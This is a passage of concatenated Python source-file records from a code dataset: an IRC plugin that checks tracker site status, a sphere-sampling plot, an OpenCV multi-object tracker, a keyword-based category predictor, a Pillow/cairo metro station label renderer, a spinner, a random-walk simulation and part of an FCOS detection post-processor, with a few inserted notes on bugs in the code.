(.*)\".*\\n.*2x\\ (.*)\".*\\n.*2x\\ (.*)\"', content.content.decode()\n )\n print(status_txt)\n status = []\n for i in range(0, 4):\n if status_txt.group(i) == \"green\":\n status.append(1)\n else:\n status.append(0)\n\n status = [status[1], status[2], status[3]]\n status_headers = [site_name + \" Site\", \"IRC\", \"Tracker\"]\n breakpoints = [0]\n line_headers = [\"\"]\n\n outStr = WebParser().prepareStatusString(\n site_name, status, status_headers, breakpoints, line_headers\n )\n\n for i in range(0, len(outStr)):\n irc.reply(outStr[i])\n\n ahd = wrap(ahdStatus, [optional(\"something\")])\n\n def abStatus(self, irc, msg, args, all):\n \"\"\"\n Check the status of AB site, tracker, and irc.\n \"\"\"\n\n # This function is different than the others because it scrapes HTML rather than use an api site\n url = \"http://status.animebytes.tv\"\n site_name = \"AB\"\n\n # Get web page content\n headers = {\n \"User-Agent\": (\n \"Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko)\"\n \" Chrome/24.0.1312.27 Safari/537.17\"\n )\n }\n try:\n content = requests.get(url, headers=headers)\n except:\n irc.reply(\"Error: Couldn't connect to \" + url)\n return\n\n # Extract statuses\n status_txt = re.search(\n r'.*site.*\\n.*status (.*)\"[\\S\\s]+tracker.*\\n.*status'\n r' (.*)\"[\\S\\s]+irc.*\\n.*status (.*)\"',\n content.content.decode(),\n )\n status = []\n for i in range(0, 4):\n if status_txt.group(i) == \"normal\":\n status.append(1)\n else:\n status.append(0)\n\n status = [status[1], status[3], status[2]]\n status_headers = [site_name + \" Site\", \"IRC\", \"Tracker\"]\n breakpoints = [0]\n line_headers = [\"\"]\n\n outStr = WebParser().prepareStatusString(\n site_name, status, status_headers, 
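In `ahdStatus` above (and the HTML scrapers that follow), the loop `for i in range(0, 4)` also tests `status_txt.group(0)` -- the whole match -- which can never equal a color name, so the first slot is discarded afterwards by re-indexing. Iterating `match.groups()` sidesteps that bookkeeping. A sketch, assuming the same regexes and page layouts as above:

```python
import re

def parse_statuses(html, pattern, ok_value="green"):
    """Return 1/0 flags for each captured group, or None if nothing matched."""
    match = re.search(pattern, html)
    if match is None:  # the original would raise AttributeError here
        return None
    # groups() yields only the captured groups, skipping group(0), so no
    # placeholder slot has to be dropped afterwards.
    return [1 if g == ok_value else 0 for g in match.groups()]
```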
breakpoints, line_headers\n )\n\n for i in range(0, len(outStr)):\n irc.reply(outStr[i])\n\n ab = wrap(abStatus, [optional(\"something\")])\n\n def empStatus(self, irc, msg, args, all):\n \"\"\"\n Check the status of EMP site, tracker, and irc.\n \"\"\"\n\n # This function is different than the others because it scrapes HTML rather than use an api site\n url = \"http://about.empornium.ph/\"\n site_name = \"EMP\"\n\n # Get web page content\n headers = {\n \"User-Agent\": (\n \"Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko)\"\n \" Chrome/24.0.1312.27 Safari/537.17\"\n )\n }\n try:\n content = requests.get(url, headers=headers)\n except:\n irc.reply(\"Error: Couldn't connect to \" + url)\n return\n\n # Extract statuses\n status_txt = re.search(\n r'.*pull-right\">(.*)<\\/span>[\\S\\s.]+?pull-right\">(.*)<\\/span>[\\S\\s.]+?pull-right\">(.*)<\\/span>[\\S\\s.]+?pull-right\">(.*)<\\/span>',\n content.content.decode(),\n )\n status = []\n for i in range(0, 5):\n if status_txt.group(i) == \"Online\":\n status.append(1)\n else:\n status.append(0)\n\n status = [status[1], status[2], status[4], status[3]]\n status_headers = [site_name + \" Site.me\", \"Site.sx\", \"Tracker\", \"IRC\"]\n breakpoints = [0]\n line_headers = [\"\"]\n\n outStr = WebParser().prepareStatusString(\n site_name, status, status_headers, breakpoints, line_headers\n )\n\n for i in range(0, len(outStr)):\n irc.reply(outStr[i])\n\n emp = wrap(empStatus, [optional(\"something\")])\n\n def nblStatus(self, irc, msg, args, all):\n \"\"\"\n Check the status of Nebulance site, tracker, and irc.\n \"\"\"\n url = \"https://status.nebulance.io/status.json\"\n site_name = \"NBL\"\n\n content = WebParser().getWebData(irc, url)\n content2 = content[\"services\"]\n\n status_tmp = [\n content2[\"site\"][\"status\"],\n content2[\"tracker\"][\"status\"],\n content2[\"tracker_ssl\"][\"status\"],\n content2[\"imagehost\"][\"status\"],\n ]\n status = []\n for service in status_tmp:\n if service:\n status.append(1)\n else:\n status.append(0)\n status_headers = [site_name + \" Site\", \"Tracker\", \"Tracker SSL\", \"Image Host\"]\n\n breakpoints = [0]\n line_headers = [\"\"]\n\n outStr = WebParser().prepareStatusString(\n site_name, status, status_headers, breakpoints, line_headers\n )\n\n for i in range(0, len(outStr)):\n irc.reply(outStr[i])\n\n nbl = wrap(nblStatus, [optional(\"something\")])\n\n # def autoAnnounce(self, irc):\n # \"\"\"Schedule periodic announces for enabled trackers and channels\"\"\"\n # print \"Start\"\n # i = 0\n # for cmd in status_commands:\n # print cmd\n # for channel in irc.state.channels:\n # print \"announce.relay\"+status_trackers[i]\n # if self.registryValue(\"announce.relay\"+status_trackers[i], channel):\n # print \"announce.relay\"+status_trackers[i]\n # try:\n # locals()[\"self.\"+cmd]()\n # except:\n # print \"Failed to query status\"\n # print channel\n # i = +1\n\n\nClass = Trackers\n","sub_path":"Trackers/plugin.py","file_name":"plugin.py","file_ext":"py","file_size_in_byte":26807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"468144718","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n#n: dimension\n#M: number of samples\nn = 2\nM = 100\nradius=1.45\n\np_metric = 2\n\nX = np.zeros(n*M)\nfor j in range(0,M):\n Xk = np.random.uniform(-1,1,n)\n\n if p_metric == 1:\n d = np.sum(np.abs(Xk))\n else:\n d = np.sqrt(np.sum(Xk**2))\n\n X[j*n:(j+1)*n] = radius*Xk/d\n\nX = np.reshape(X,(M,n))\nplt.plot(X[:,0],X[:,1],'ok')\n\nt = 
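A caveat on the sampling loop above: for `p_metric == 2`, drawing from the cube `[-1, 1]^n` and projecting radially is not uniform on the circle/sphere -- directions toward the cube's corners are over-represented. The standard isotropic construction normalizes Gaussian draws instead; a sketch for the p=2 case:

```python
import numpy as np

def sample_sphere(n, M, radius=1.45):
    """Uniform points on the radius-scaled (n-1)-sphere (p=2 case).

    Gaussian vectors are rotationally symmetric, so normalizing them gives
    a uniform direction -- unlike normalized uniform-cube draws, which pile
    up density toward the cube's corners.
    """
    X = np.random.normal(size=(M, n))
    return radius * X / np.linalg.norm(X, axis=1, keepdims=True)
```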
np.linspace(-np.pi,+np.pi,100)\nplt.plot(radius*np.cos(t),radius*np.sin(t),'-k')\nplt.show()\n","sub_path":"scripts/uniform_sphere_sampling.py","file_name":"uniform_sphere_sampling.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"40050577","text":"import cv2\n\nclass Tracker():\n '''Instantiates the tracker: \n - Number of frames missed\n - Bouding box position\n - Initializes KCF tracker\n '''\n def __init__(self, img, pos):\n self.frames_disapeared = 0\n self.pos = pos # (Xi, Yi, w, h)\n self.trk_center = [int(pos[0] + pos[2]/2), int(pos[1] + pos[3]/2)]\n self.trk = cv2.TrackerKCF_create()\n self.trk.init(img, pos)\n\nclass objects_updator():\n '''Instantiates the object that will manager the trackers (Add, delete and update): \n - List of all trackers\n - Number of frames max that a tracker can be missed (without matches)\n '''\n def __init__(self, max_disapeared = 20):\n self.trackers_list = []\n self.max_disapeared = max_disapeared\n\n # Verifies the matches between trackers and detections, returning new detections, trackers missed, and trackers matches\n def verify_dets(self, dets):\n matched_trk = []\n unmatched_trk = [] \n matched_dets = []\n new_dets = []\n \n for id_trk, trk in enumerate(self.trackers_list):\n for id_det, pos in enumerate(dets):\n xi, yi, xf, yf = [pos[0], pos[1], pos[0] + pos[2], pos[1] + pos[3]]\n if ( trk.trk_center[0] >= xi and trk.trk_center[0] <= xf ) and ( trk.trk_center[1] >= yi and trk.trk_center[1] <= yf ):\n matched_trk.append(id_trk)\n matched_dets.append(id_det)\n \n if id_trk not in matched_trk:\n print(\"Unmatched\")\n unmatched_trk.append(id_trk)\n\n for idx_dets in range(len(dets)):\n if idx_dets not in matched_dets:\n new_dets.append(idx_dets)\n\n return matched_trk, unmatched_trk, new_dets\n\n def update_trks(self, img):\n for idx, trk in enumerate(self.trackers_list):\n (success, trk.pos) = trk.trk.update(img)\n if success:\n (x, y, w, h) = [int(v) for v in trk.pos]\n trk.trk_center = [int(x + w/2), int(y + h/2)] # Tracker centroid\n cv2.rectangle(img, (x, y), (x + w, y + h), (0, 0, 255), 3)\n else:\n self.trackers_list.pop(idx)\n\n\n def update_dets(self, img, dets):\n # Returns the ID's of the matched/unmatched trackers and the id of new detections\n matched_trk, unmatched_trk, new_dets = self.verify_dets(dets) \n\n for idx in new_dets:\n self.trackers_list.append(Tracker(img, dets[idx]))\n\n for idx in unmatched_trk:\n self.trackers_list[idx].frames_disapeared += 1\n if self.trackers_list[idx].frames_disapeared == self.max_disapeared:\n self.trackers_list.pop(idx)\n\n for idx in matched_trk:\n self.trackers_list[idx].frames_disapeared = 0\n\n return new_dets\n\n\n\n","sub_path":"class_tracker.py","file_name":"class_tracker.py","file_ext":"py","file_size_in_byte":2862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"439740386","text":"import re\nimport Rake\n\n\n\ndef predictCategory(fname):\n with open('vocabulary.txt','r') as voc_ref:\n vocabulary=voc_ref.read()\n vocabulary = re.split('\\n', vocabulary)\n if '' in vocabulary:\n vocabulary.remove('')\n vocabulary = [token.split(':') for token in vocabulary]\n\n voc_dict={}\n for token in vocabulary :\n if len(token)==2:\n voc_dict [token [0]]=token[1]\n\n #tokens=Tokenize(fname)\n\n with open (fname,'r') as text_ref:\n text=text_ref.read()\n\n\n rake_obj = Rake.Rake('stopwords.txt')\n tokens=rake_obj.run(text)\n\n\n\n category = {}\n 
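`update_trks` in class_tracker.py above pops from `self.trackers_list` while enumerating it, which skips the element that follows every removal (`update_dets` has the same pattern, with indices that go stale after a pop). The usual fix is to rebuild the list from the survivors; a sketch using the same `Tracker`/cv2 API as the class:

```python
def update_trks(self, img):
    survivors = []
    for trk in self.trackers_list:
        success, trk.pos = trk.trk.update(img)
        if success:
            x, y, w, h = [int(v) for v in trk.pos]
            trk.trk_center = [x + w // 2, y + h // 2]
            cv2.rectangle(img, (x, y), (x + w, y + h), (0, 0, 255), 3)
            survivors.append(trk)   # keep only trackers that updated
    self.trackers_list = survivors  # no in-place pops while iterating
```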
for token in tokens :\n if token[0] in voc_dict :\n cls= voc_dict[token[0]]\n if cls in category:\n category[cls]+=1\n else:\n category[cls] = 1\n print (category)\n clslist = []\n if category!={}:\n clslist=[]\n x = max(category.values())\n for cls in category:\n if category[cls] == x or category [cls]==x-1:\n clslist .append(cls)\n return clslist","sub_path":"prediction.py","file_name":"prediction.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"85945201","text":"from PIL import Image, ImageDraw, ImageFilter, ImageFont\nimport cairo\nimport math\nimport os\nimport unicodedata\n \nclass Station:\n def __init__(self, key, zhName, enName, namePos, angle, lineNum, color=\"black\", outline=\"white\", thickness=0, interchange=None):\n self.__key = key\n self.__zhName = zhName\n self.__enName = enName\n self.__namePos = namePos\n self.__angle = angle\n self.__lineNum = lineNum\n self.__color = color\n self.__outline = outline\n self.__thickness = thickness\n self.__interchange = interchange\n \n def generate(self):\n circlePath, centerPoints = self.__createCircle(self.__angle, self.__lineNum)\n nameList = self.__createName(self.__zhName, self.__enName, self.__namePos, self.__color, self.__outline, self.__thickness)\n \n self.__mergeImage(Image.open(circlePath), nameList)\n \n def __from_pil(self, im, alpha=1.0, format=cairo.FORMAT_ARGB32):\n \"\"\"\n :param im: Pillow Image\n :param alpha: 0..1 alpha to add to non-alpha images\n :param format: Pixel format for output surface\n \"\"\"\n assert format in (cairo.FORMAT_RGB24, cairo.FORMAT_ARGB32), \"Unsupported pixel format: %s\" % format\n if 'A' not in im.getbands():\n im.putalpha(int(alpha * 256.))\n arr = bytearray(im.tobytes('raw', 'BGRa'))\n surface = cairo.ImageSurface.create_for_data(arr, format, im.width, im.height)\n return surface\n \n # str (path to the png), list (centre point for line)\n def __createCircle(self, angle, lineNum):\n assert type(angle) is int or type(angle) is float, \"not int ot float\"\n assert type(lineNum) is int, \"not int\"\n assert lineNum > 0, \"line number must greater than 0\"\n assert 0 <= angle < 180, \"angle must be greater or equal than 0, and less than 180\"\n \n x = 115 * (lineNum-1) * math.cos( angle * math.pi / 180 )\n y = 115 * (lineNum-1) * math.sin( angle * math.pi / 180 )\n \n width, height = 205 + int(math.ceil(abs(x))),\\\n 205 + int(math.ceil(abs(y)))\n\n im = Image.new(\"RGBA\", (width, height))\n surface = self.__from_pil(im)\n ctx = cairo.Context(surface)\n \n radius = (102.5, 77.5)\n \n for i in range(len(radius)):\n \n \"\"\"\n : CIRCLE SEGMENT\n \"\"\"\n \n for d in (0,1):\n \n ctx.arc(\n 102.5 + x * d - x * int(angle>90),\n 102.5 + y * d,\n radius[i],\n 0,\n math.pi * 2\n )\n \n ctx.close_path()\n ctx.set_source_rgb(i,i,i)\n ctx.fill()\n \n \"\"\"\n : EXTENDED RECTANGLE\n \"\"\"\n \n ctx.move_to( 102.5 - x * int(angle>90), 102.5 )\n ctx.line_to(\n 102.5 + x - x * int(angle>90),\n 102.5 + y\n )\n ctx.set_source_rgb(i,i,i)\n ctx.set_line_width(radius[i]*2)\n ctx.stroke()\n \n \"\"\"\n : CALCULATE CENTRE POINT(S) FOR LINES\n \"\"\"\n \n diff = (\n 115 * math.cos( angle * math.pi / 180 ),\n 115 * math.sin( angle * math.pi / 180 )\n )\n \n center = []\n \n for i in range(lineNum):\n center.append((\n float(\"{0:.5f}\".format(\n 102.5 + x - x * int(angle>90) - diff[0] * (i)\n )),\n float(\"{0:.5f}\".format(\n 102.5 + y - diff[1] * (i)\n ))\n ))\n \n path = \"result/temp_circle.png\"\n 
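The voting logic in `predictCategory` above -- tally classes, keep those within one vote of the leader -- can be stated compactly with `collections.Counter`; `predict_classes` is an illustrative name:

```python
from collections import Counter

def predict_classes(tokens, voc_dict):
    """Return the classes whose vote count is the max or one below it."""
    votes = Counter(voc_dict[tok[0]] for tok in tokens if tok[0] in voc_dict)
    if not votes:
        return []
    top = max(votes.values())
    return [cls for cls, n in votes.items() if n >= top - 1]
```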
surface.write_to_png(path)\n return path, center[::-1]\n \n # list (of Image)\n def __createName(self, zhName, enName, namePos, color=\"black\", outline=\"white\", thickness=4):\n \n assert not (\"E\" in namePos and \"W\" in namePos) and not (\"N\" in namePos and \"S\" in namePos), \"invalid position\"\n \n name = [zhName, enName]\n png_list = []\n \n for d in range(len(name)):\n line = name[d].count(\"\\n\")+1\n size = (67 + 14 if d else 147 + 32) * 1.1 / line\n font = ImageFont.truetype(\n font='font/FreeSansBold.ttf' if d else 'font/SourceHanSerifTC-Bold.otf',\n size=int(size)\n )\n name_list = name[d].split(\"\\n\")\n \n maxWidth, maxHeight = 0, 0\n zhAve = []\n lineWidth = []\n for i in range(line):\n \n charWidth = [unicodedata.east_asian_width(char) for char in name_list[i]]\n \n w, h = ImageDraw.Draw(Image.new(\"RGBA\",(1,1))).textsize(\n name_list[i],\n font=font\n )\n w1, h1 = ImageDraw.Draw(Image.new(\"RGBA\",(1,1))).textsize(\n \"hg\",\n font=font\n )\n if w > maxWidth: maxWidth = w\n if h > maxHeight: maxHeight = h\n if h1 > maxHeight and d: maxHeight = h1\n if \"Na\" not in charWidth:\n zhAve.append(w/len(name_list[i]))\n lineWidth.append(1)\n else:\n lineWidth.append(0)\n \n if zhAve: zhAve = sum(zhAve)/len(zhAve)\n else: zhAve = 0\n \n \"\"\"\n : maxWidth indicates the width for every line of the text\n : maxHeight indicates the height for every line of the text\n : zhAve indicates the average value of East Asian character appeared; not include text that have non E.A. character\n : lineWidth[i] indicates whether there are non E.A. character in the text, used for aligning\n \"\"\"\n \n width = maxWidth + thickness*2\n height = maxHeight * line + thickness*2\n \n png = Image.new(\"RGBA\", (width, height))\n png_draw = ImageDraw.Draw(png)\n \n x = math.ceil(maxWidth/2)+thickness\n y = math.ceil(maxHeight/2)+thickness\n \n for i in range(line):\n \n w, h = ImageDraw.Draw(Image.new(\"RGBA\",(1,1))).textsize(\n name_list[i],\n font=font\n )\n \n x1 = x - (\n (w * int(d or not lineWidth[i]) + zhAve * len(name_list[i]) * lineWidth[i]) * int(\"W\" in namePos or (\"S\" in namePos or \"N\" in namePos) and not (\"E\" in namePos))\n ) / (\n 1 + int((\"S\" in namePos or \"N\" in namePos) and not (\"W\" in namePos))\n ) + (\n (x - thickness) * int(\"W\" in namePos)\n ) - (\n (x - thickness) * int(\"E\" in namePos)\n )\n \n for j in range(-thickness,thickness+1,1):\n for k in range(-thickness,thickness+1,1):\n png_draw.text(\n (\n x1 + j,\n i * maxHeight + k\n ),\n text=name_list[i],\n font=font, fill=outline\n )\n \n png_draw.text(\n (\n x1,\n i * maxHeight\n ),\n text=name_list[i],\n font=font, fill=color\n )\n \n #png.save(\"result/__station__{0}__{1}.png\".format(self.__key, \"en\" if d else \"zh\"))\n png_list.append(png)\n \n return png_list\n \n # centre point(s) of station circle (save as png)\n def __mergeImage(self, station, name, interchange=None):\n \n station_w, station_h = station.size\n zhname_w, zhname_h = name[0].size\n enname_w, enname_h = name[1].size\n \n hd = 20 # Horizontal difference\n \n if \"N\" in self.__namePos or \"S\" in self.__namePos:\n imageHeight = station_h + zhname_h + enname_h\n else:\n imageHeight = max(station_h, zhname_h + enname_h)\n if \"E\" in self.__namePos or \"W\" in self.__namePos:\n imageWidth = station_w + max(zhname_w, enname_w) + hd\n else:\n imageWidth = max(station_w, zhname_w, enname_w)\n \n im = Image.new(\"RGBA\", (imageWidth, imageHeight))\n \n #\"\"\"\n if \"N\" in self.__namePos or \"S\" in self.__namePos:\n station_x = 
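The nested `j`/`k` loops above render the outline by re-stamping the text at every offset within `thickness`. If upgrading Pillow is an option, `ImageDraw.text` has supported native outlines via `stroke_width`/`stroke_fill` since Pillow 6.2, which is faster and gives rounder corners; a sketch reusing the script's own font path:

```python
from PIL import Image, ImageDraw, ImageFont

img = Image.new("RGBA", (600, 160))
draw = ImageDraw.Draw(img)
font = ImageFont.truetype("font/FreeSansBold.ttf", 96)
draw.text((20, 20), "Station", font=font, fill="black",
          stroke_width=4, stroke_fill="white")  # outline in one call
```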
imageWidth//2 - station_w//2\n zhname_x = imageWidth//2 - zhname_w//2\n enname_x = imageWidth//2 - enname_w//2\n if \"E\" in self.__namePos:\n station_x = 0\n zhname_x = station_w + hd\n enname_x = station_w + hd\n if \"W\" in self.__namePos:\n station_x = imageWidth - station_w\n zhname_x = imageWidth - station_w - hd - zhname_w\n enname_x = imageWidth - station_w - hd - enname_w\n if \"E\" in self.__namePos or \"W\" in self.__namePos:\n station_y = imageHeight//2 - station_h//2\n zhname_y = 0\n enname_y = zhname_h\n if \"S\" in self.__namePos:\n station_y = 0\n zhname_y = station_h\n enname_y = station_h + zhname_h\n if \"N\" in self.__namePos:\n station_y = enname_h + zhname_h\n zhname_y = 0\n enname_y = zhname_h\n \n im.paste(station, (station_x, station_y))\n im.paste(name[0], (zhname_x, zhname_y))\n im.paste(name[1], (enname_x, enname_y))\n \n im.save(\"result/__station__{0}.png\".format(self.__key))\n \n os.remove(\"result/temp_circle.png\")\n \nclass Interchange:\n def __init__(self, key, zhName, enName, lineColor, textColor=\"black\", outline=\"white\"):\n self.key = key\n self.zhName = zhName\n self.enName = enName\n self.lineColor = lineColor\n self.textColor = textColor\n self.outline = outline\n \nclass Interchanges:\n def __init__(self, interchange_list=[], direction=\"N\", thickness=0):\n self.__list = interchange_list\n self.__direction = direction\n self.__thickness = thickness\n \n def generate(self):\n interchangePath = self.__createInterchange(self.__list, self.__direction, self.__thickness)\n \n def __from_pil(self, im, alpha=1.0, format=cairo.FORMAT_ARGB32):\n \"\"\"\n :param im: Pillow Image\n :param alpha: 0..1 alpha to add to non-alpha images\n :param format: Pixel format for output surface\n \"\"\"\n assert format in (cairo.FORMAT_RGB24, cairo.FORMAT_ARGB32), \"Unsupported pixel format: %s\" % format\n if 'A' not in im.getbands():\n im.putalpha(int(alpha * 256.))\n arr = bytearray(im.tobytes('raw', 'BGRa'))\n surface = cairo.ImageSurface.create_for_data(arr, format, im.width, im.height)\n return surface\n \n # str (path to the png)\n def __createInterchange(self, list, direction=\"N\", thickness=0):\n assert type(direction) is str, \"must be str\"\n assert direction in (\"N\", \"E\", \"W\", \"S\"), \"must be 'N', 'S', 'E' or 'W'\"\n \n path = \"result/temp_line.png\"\n \n if direction in (\"N\", \"S\"):\n maxWidth = 0\n for i in list:\n for d in (0, 1):\n size = (53 + 18 if d else 67 + 21) * 1.1\n font = ImageFont.truetype(\n font='font/FreeSansBold.ttf' if d else 'font/SourceHanSerifTC-Bold.otf',\n size=int(size)\n )\n \n w, h = ImageDraw.Draw(Image.new(\"RGBA\",(1,1))).textsize(\n i.enName if d else i.zhName,\n font=font\n )\n \n if w > maxWidth: maxWidth = w\n \n width, height = 41+(maxWidth+thickness)*2, 122*len(list)\n \n png = Image.new( \"RGBA\", (width, height) )\n png_draw = ImageDraw.Draw(png)\n \n surface = self.__from_pil(png)\n ctx = cairo.Context(surface)\n \n for i in range(len(list)):\n ctx.move_to(width/2, 122*len(list))\n ctx.line_to(width/2, 122*len(list) - 122*(len(list)-i))\n ctx.set_source_rgb(\n int(list[i].lineColor[0:2],16)/255,\n int(list[i].lineColor[2:4],16)/255,\n int(list[i].lineColor[4:6],16)/255\n )\n ctx.set_line_width(41)\n ctx.stroke()\n \n surface.write_to_png(path)\n png2 = Image.open(path)\n \n for d in (0, 1):\n size = (53 + 18 if d else 67 + 21)\n font = ImageFont.truetype(\n font='font/FreeSansBold.ttf' if d else 'font/SourceHanSerifTC-Bold.otf',\n size=size\n )\n \n for i in range(len(list)):\n w, h = 
ImageDraw.Draw(Image.new(\"RGBA\",(1,1))).textsize(\n list[i].zhName,\n font=font\n )\n w1, h1 = ImageDraw.Draw(Image.new(\"RGBA\",(1,1))).textsize(\n \"hg\",\n font=font\n )\n \n x = width/2 + 41/2 * (2*d-1) + w * (d-1) + (20 * (2*d-1)) + 2 * (d-1)\n y = height/2 - h1/2 * d + h/2 * (d-1) + 12 * (d-1)\n \n for j in range(-thickness,thickness+1,1):\n for k in range(-thickness,thickness+1,1):\n png_draw.text(\n (\n x + j,\n y + 122 * i - ( 122*(len(list)-1) - 122*(len(list)-1)/2) + k\n ),\n text=list[i].enName if d else list[i].zhName,\n font=font, fill=list[i].outline\n )\n \n png_draw.text(\n (\n x,\n y + 122 * i - ( 122*(len(list)-1) - 122*(len(list)-1)/2)\n ),\n text=list[i].enName if d else list[i].zhName,\n font=font, fill=list[i].textColor\n )\n \n png.alpha_composite(png2)\n png.save(\"result/__interchange.png\".format(list[i].key, d))\n \n else:\n pass\n \n os.remove(path)","sub_path":"station.py","file_name":"station.py","file_ext":"py","file_size_in_byte":15191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"251351968","text":"import os\nimport sys\nimport time\n\nfrom get_holiday_color import *\n\nCOLORS = [RED for _ in range(10)] + [GREEN for _ in range(10)]\n\ndef twiddle(secs):\n len_sleep = 0.1\n times = int(secs / len_sleep)\n frames=['|', '/', '-', '\\\\']\n for i in range(times):\n color_index = i % len(COLORS)\n index = i % len(frames)\n sys.stdout.write(COLORS[color_index])\n sys.stdout.write(frames[index])\n sys.stdout.flush()\n time.sleep(len_sleep)\n sys.stdout.write('\\b')\n sys.stdout.write(DEFAULT_COLOR)\n\nif __name__ == \"__main__\":\n twiddle(3)\n","sub_path":"present/resources/twiddle.py","file_name":"twiddle.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"385537580","text":"\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport pandas as pd\nimport numba\n\nimport stats\n\n# website says tau (step time) is about 0.5 sec, but we just care about steps for now\n@numba.jit()\ndef backtrack_steps():\n t = 0\n x = 0\n\n directions = np.array([-1, 1], dtype=int)\n\n while x <= 0:\n x = x + np.random.choice(directions)\n t += 1\n\n return t\n\n@numba.jit()\ndef gen_backtracks(n=10000):\n bt_reps = np.empty(n)\n\n for i in range(n):\n #print(i)\n bt_reps[i] = backtrack_steps()\n\n return bt_reps\n\nrerun_simulation = True\nfilename = '../../data/my_pause_steps.csv'\n\nif rerun_simulation:\n # binsize again?\n bts = gen_backtracks()\n\n # doesn't illustrate the power law distributed data very well\n #plt.hist(gen_backtracks(), normed=True)\n #plt.title('Backtrack step counts on pause')\n #plt.show()\n\n bt_sorted, bt_cpf = stats.ecdf(bts)\n \n # turn the recorded step counts into a DataFrame\n d = {'steps until +1': bts}\n df = pd.DataFrame(data=d)\n\n # save the data as a DataFrame to save it in a manner consistent with theme today\n df.to_csv(filename, index=False)\n\nif not rerun_simulation:\n df = pd.read_csv(filename)\n\n# determine a reasonable range to plot the histogram over\nmax_pwr = np.log(df['steps until +1'].max()) / np.log(10)\n\nplt.hist(df['steps until +1'], bins=np.logspace(0, max_pwr, 50))\nplt.gca().set_xscale('log')\nplt.gca().set_yscale('log')\nplt.title('Steps before simulated pauses end')\nplt.xlabel('Number of steps')\nplt.ylabel('Cumulative probability')\nplt.show()\n\n\"\"\"\nCCDF exponent of -1/2 => PDF exponent of -3/2 b/c CDF is integral (but 
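station.py above hands images from cairo to Pillow through `result/temp_circle.png` and deletes the file afterwards. pycairo's `Surface.write_to_png` also accepts a writable file object, so the hand-off can stay in memory; a sketch, assuming a pycairo version with file-object support:

```python
import io
from PIL import Image

def surface_to_pil(surface):
    """Convert a cairo surface to a PIL Image without touching the disk."""
    buf = io.BytesIO()
    surface.write_to_png(buf)  # pycairo accepts file-like objects here
    buf.seek(0)
    return Image.open(buf)
```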
CCDF?)\n\"\"\"\n","sub_path":"created/3/monte_carlo.py","file_name":"monte_carlo.py","file_ext":"py","file_size_in_byte":1682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"567161734","text":"import torch\n\nfrom ..inference import RPNPostProcessor\nfrom ..utils import permute_and_flatten\n\nfrom maskrcnn_benchmark.modeling.box_coder import BoxCoder\nfrom maskrcnn_benchmark.modeling.utils import cat\nfrom maskrcnn_benchmark.structures.bounding_box import BoxList\nfrom maskrcnn_benchmark.structures.boxlist_ops import cat_boxlist\nfrom maskrcnn_benchmark.structures.boxlist_ops import boxlist_nms\nfrom maskrcnn_benchmark.structures.boxlist_ops import remove_small_boxes\nimport torch.nn.functional as F\nimport numpy as np\n\n\nclass FCOSPostProcessor(torch.nn.Module):\n \"\"\"\n Performs post-processing on the outputs of the RetinaNet boxes.\n This is only used in the testing.\n \"\"\"\n def __init__(\n self,\n pre_nms_thresh,\n pre_nms_top_n,\n nms_thresh,\n fpn_post_nms_top_n,\n min_size,\n num_classes,\n vis_labels\n ):\n \"\"\"\n Arguments:\n pre_nms_thresh (float)\n pre_nms_top_n (int)\n nms_thresh (float)\n fpn_post_nms_top_n (int)\n min_size (int)\n num_classes (int)\n box_coder (BoxCoder)\n \"\"\"\n super(FCOSPostProcessor, self).__init__()\n self.pre_nms_thresh = pre_nms_thresh\n self.pre_nms_top_n = pre_nms_top_n\n self.nms_thresh = nms_thresh\n self.fpn_post_nms_top_n = fpn_post_nms_top_n\n self.min_size = min_size\n self.num_classes = num_classes\n self.vis_labels = vis_labels\n\n def forward_for_single_feature_map(\n self, locations, box_cls_set,\n box_regression, centerness,\n image_sizes, show_box_cls):\n \"\"\"\n Arguments:\n anchors: list[BoxList]\n box_cls: tensor of size N, A * C, H, W\n box_regression: tensor of size N, A * 4, H, W\n \"\"\"\n box_prob_set = []\n for _box_cls in np.array(list(box_cls_set.values()))[[2]]: #\n N, C, H, W = _box_cls.shape\n _box_cls = _box_cls.view(N, C, H, W).permute(0, 2, 3, 1)\n box_prob_set.append(_box_cls.reshape(N, -1, C).sigmoid())\n box_cls = torch.exp(torch.log(torch.stack(box_prob_set)).mean(dim=0))\n # max_score = box_prob_set[-1].max()\n # box_prob_set[:-1] = [box_prob / box_prob.max() * max_score for box_prob in box_prob_set[:-1]]\n # box_cls = torch.stack(box_prob_set).max(dim=0)[0]\n centerness = None\n\n # put in the same format as locations\n box_regression = box_regression.view(N, 4, H, W).permute(0, 2, 3, 1)\n box_regression = box_regression.reshape(N, -1, 4)\n if centerness is not None:\n centerness = centerness.view(N, 1, H, W).permute(0, 2, 3, 1)\n centerness = centerness.reshape(N, -1).sigmoid()\n\n if self.vis_labels:\n # box_prob_set.extend([box_cls, centerness, centerness[:,:,None]*box_prob_set[-1]])\n show_box_cls(box_prob_set, N, H, W, C, self.pre_nms_thresh)\n\n candidate_inds = box_cls > self.pre_nms_thresh\n pre_nms_top_n = candidate_inds.view(N, -1).sum(1)\n pre_nms_top_n = pre_nms_top_n.clamp(max=self.pre_nms_top_n)\n\n # multiply the classification scores with centerness scores\n if centerness is not None:\n box_cls = (box_cls * centerness[:, :, None])\n\n results = []\n for i in range(N):\n per_box_cls = box_cls[i]\n per_candidate_inds = candidate_inds[i]\n per_box_cls = per_box_cls[per_candidate_inds]\n\n per_candidate_nonzeros = per_candidate_inds.nonzero()\n per_box_loc = per_candidate_nonzeros[:, 0]\n per_class = per_candidate_nonzeros[:, 1] + 1\n\n per_box_regression = box_regression[i]\n per_box_regression = per_box_regression[per_box_loc]\n 
